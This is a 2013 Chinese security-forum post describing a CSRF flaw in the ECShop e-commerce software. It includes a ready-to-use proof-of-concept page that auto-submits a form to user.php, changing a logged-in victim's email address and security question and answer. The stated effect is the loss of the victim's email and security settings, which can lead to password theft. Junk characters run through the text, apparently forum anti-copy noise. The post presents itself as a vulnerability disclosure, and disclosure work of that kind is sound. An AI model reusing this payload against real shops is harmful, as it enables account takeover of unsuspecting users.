找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1824|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:( w# }, H9 y0 V2 ]3 R3 O
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
6 h8 O  m6 d) q( p0 ^( g8 e# _. X0 }; h9 H  @
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
- B, t4 b2 d  R7 X5 S
+ G9 v! W  D, h& I( [: u) I1 n详细说明:
  t$ Q4 B2 j# |+ N: @7 K利用csrf和xss可以突破官方所说的“障碍”
/ x. o& c$ p3 dxss版本已经有人说明& `' V7 W7 n9 I/ K, y: B$ v
这里给出csrf版本2 T% D5 [7 z# b$ Z& S7 P

, g5 M& L  q! W# r% X! D漏洞证明:
1 Z& s+ j. q" I+ C+ D  V<html>
" t6 k% Z/ X- s3 t5 |/ a# b6 N<body>
5 m2 v8 z( V7 r3 E" Q<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
+ \' W4 L6 l6 U4 I/ y+ c/ a$ X<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
6 v: @) k4 j. Z. b<INPUT TYPE="text" NAME="act" value="act_edit_profile">' Q! v; g- M  \! f6 j. _! h! l; c
<INPUT TYPE="text" NAME="sel_question" value="ecshop">, v$ V% ^+ {5 p2 c* ]0 |" r- ~
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
. R) S& e, C: C+ t" U</body>3 B1 `3 |. {9 T$ t
<script>
4 C! y$ `9 }7 C$ q+ _7 f1 N8 w# odocument.forms[0].submit();, Y9 A0 b/ n1 \7 [
</script>
+ h/ @4 N" T. Y</html>
7 A: p5 `. H2 y+ D' ~8 x0 @2 @' I" |构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
6 ^0 w0 T; ^9 E- `; E  v
+ ?) H. p+ E$ r" l  B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表